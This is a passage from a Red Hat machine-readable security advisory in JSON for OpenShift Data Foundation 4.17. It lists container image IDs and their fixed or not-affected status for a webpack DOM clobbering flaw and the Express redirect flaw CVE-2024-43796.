"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule"
},
{
"cve": "CVE-2024-43796",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-09-10T15:30:28.106254+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2311152"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Express. This vulnerability allows untrusted code execution via passing untrusted user input to response.redirect(), even if the input is sanitized.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "express: Improper Input Handling in Express Redirects",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x"
],
"known_not_affected": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
